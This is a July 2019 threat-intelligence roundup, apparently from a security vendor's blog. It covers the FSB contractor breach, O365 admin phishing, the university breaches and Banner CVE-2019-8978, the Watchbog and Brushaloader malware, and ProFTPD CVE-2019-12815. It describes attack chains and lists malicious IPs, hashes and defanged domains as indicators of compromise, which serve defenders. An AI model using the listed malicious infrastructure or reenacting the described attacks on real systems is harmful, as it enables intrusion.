Threat Report

Wednesday July 24th 2019

Let’s get this party started. Russian FSB’s secret projects exposed, new Office 365 (O365) phishing campaign underway, universities at risk to phishing, and newly disclosed vulnerabilities, Brushaloader and Watchbog go wild. Oh, and a ProFTP vulnerability hits the streets.

FSB contracted breached for 7.5TB

A group of hackers named 0v1ru$ have breached Sytech, a contractor for FSB, Russia’s national intelligence service, on July 13, 2019. The group was able to hack into SyTech’s Active Directory server where they accessed the company’s entire network, including a JIRA instance.

Hackers stole 7.5TB of data from the contractor’s network and defaced the company’s website.

Hackers also posted screenshots of the company’s database on Twitter and shared the data to Digital Revolution, another hacking group.

The second group shared the stolen data on their Twitter account on July 18, 2019.

FSB’s (formerly) secret projects include:

  • Nautilus – a project for collecting data about social media users
  • Nautilus-S – a project for deanonymizing Tor traffic with the help of rogue Tor servers
  • Reward – a project to covertly penetrate P2P networks
  • Mentor – a project to monitor and search email communications on the servers of Russian companies
  • Hope – a project to investigate the topology of the Russian internet and how it connects to other countries’ networks
  • Tax-3 – a project for the creation of a closed intranet to store the information of highly-sensitive state figures, judges, and local administration officials, separate from the rest of the state’s IT networks

BBC Russia received the trove of data, claims there were other older projects for researching other network protocols such as Jabber, ED2K, and OpenFT. SyTech took down its website and has refused to respond to media inquiries.

Phishing for O365 admins

An ongoing phishing campaign has been spotted in the wild that targets Office 365 admins. Using spoofed Office 365 admin alerts containing sensitive issues that require an admins immediate action, they are able to trick potential victims.

Once clicking the fake, malicious alert, victims will be brought to a phishing landing page that prompts to enter the Microsoft login credentials that are hosted on Azure using a certificate from Microsoft to make it look legitimate.

Successful exploitation can allow attackers to create new accounts under an organizations’ domain, send mail as other users, and read others user’s emails.

Users should always be cautious when viewing email content that pretends to be legitimate from a company or vendors to prevent any potential attacks. Users should also monitor their Office 365 logs for new account creation and logins from unfamiliar source addresses.

Universities under siege

Hackers gained access to databases of Lancaster University and stole personal data of prospective and current students. Names, addresses, telephone numbers, and email addresses were compromised by hackers who gained access to undergraduate students’ application records for 2019 and 2020.

The university has over 13K students, but no exact number of people were impacted. The student records system was also breached resulting in access to ID documents of what the university described as a small number of students.

Undergraduate applicants were targeted by phishing emails with fraudulent invoices and the university warned potential victims to be aware. Lancaster became aware of the breach on July 19, 2019 and set up an incident response team to investigate. Lancaster University said it focused on safeguarding IT systems and is busy identifying and advising those who have been affected.

In related university security news, the exploitation of Ellucian Banner Web Tailor vulnerability, tracked CVE-2019-8978, has been spotted in the wild that impacted systems of 62 colleges and universities by leveraging a known vulnerability.

The vulnerability affects Ellucian Banner Web Tailor versions 8.8.3, 8.8.4, and 8.9 and Banner Enterprise Identity Services versions 8.3, 8.3.1, 8.3.2, and 8.4. CVE-2019-8978 allows remote attackers to steal a victim’s session and cause a denial of service.

The U.S. Department of Education issued an alert after gathering information of exploitation attempt against 62 universities. The victims reported that after breaking into their systems, attackers leverage scripts in the admissions or enrollment section of the affected Banner system to create multiple student accounts.

It also reported that at least 600 fraudulent student accounts were created within a 24-hour period and leveraged for criminal activity. Since the Ellucian Banner Web Tailor system is connected to the rest of the ERP that is used by over 1,400 colleges, universities, and other institutions, attackers might gain access to students’ financial aid data.

Organizations best defense is to keep the software up-to-date with timely patches to prevent any potential attacks. No indicators of compromise were released with this report.

Jira and Exim servers’ exploits lead to Watchbog Trojan variant

Hackers are exploiting vulnerable Jira and Exim servers to infect them with a new Watchbog Linux Trojan variant and use the resulting botnet to be a part of a Monero cryptomining operation. The new variant was spotted by Intezer Labs’ polarply on VirusTotal and uses a malicious payload that exploits 12-day old Jira template injection vulnerability, CVE-2019-11581. It will also abuse the Exim remote command execution flaw, tracked as CVE-2019-10149. A Shodan search showed there are over 1,610,000 unpatched Exim servers that can be affected by this attack and over 54K vulnerable Atlassian JIRA servers as per BinaryEdge. This variant is dangerous because there was no detection in any scanning engines that was seen in VirusTotal. Watchbog drops a Monero coinminer after exploiting a vulnerable target. In addition, it will download and execute malicious commands from Pastebin that deploys and launches the final cryptocurrency miner payload. The malware also achieves persistence in the compromised system so it can reinfect it. Based on the coinmining config, the variant uses the minexmr.com mining pool. The malicious script also drops the coinminer on compromised Linux servers and includes a contact note for its victims.

First observed in June 2018, Brushaloader is a growing family of downloaders used by actors to profile infected machines and then load more advanced payloads. This allows actors to better stay under the radar versus using highly disruptive techniques like ransomware or distributing massive malicious spam campaigns.

Immediately upon execution, Brushaloader receives a PowerShell script called “PowerEnum.” PowerEnum then fingerprints infected devices and sends the data back to the C2 server. This communication occurs over a raw TCP parallel channel to Brushaloader. PowerEnum is integral to BrushaLoader, sharing the same C2 infrastructure.

Researchers note that based on insights gathered from observing the command and control panel, the loader exhibits high infection success rates. The following indicators of compromise were released with researchers’ findings.

IOC

210.16.101.169
185.203.117.63

Hashes

d994f65735bb53dda95f7ab097e59bbd2043f8091d246bc4e21ba55ba6bda764
eb12ece1bb8ebaf888282db3c6c852f3e21397d60b45a694c424690b2d6fe838
bf70c2a22bfb0cc952b29689394e623b632f1c3371f2a6864fd26514639393aa
04869bef3007a33e8bf9b14bd650e2b872daa6d2bb2b5ea35d4cb271f35d49e2
a1a6886f86ac1080d2fc3d645a8a1223209bfb1e91918d90a99b06d559ccb010
a3f00f3b77faed13f24c8d572fe59ac38a2467449a60a1b9dc1c64baeb145b0a

Domains

Fees.tetofevent[.]online
Analiticap[.]info

ProFTPD suffers from code execution bug

ProFTPD servers are vulnerable to remote code execution and information disclosure bug, tracked as CVE-2019-12815, that could be triggered after successful exploitation of an arbitrary file copy vulnerability. CVE-2019-12815 is an arbitrary file copy vulnerability in “mod_copy” in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication and related to CVE-2015-3306, a bug from 2015 which enabled remote attackers to read and write to arbitrary files using “SITE CPFR” and “SITE CPTO” commands. There are more than one million servers that are vulnerable. The huge spike of vulnerable servers has the potential for abuse by the attackers using future exploits to compromise and infect all unpatched servers with malware. Users are advised to update to ProFTPD version 1.3.6 to address this vulnerability.

Paul Scott

Paul Scott
Has 6 Gold Stars
LinkedIn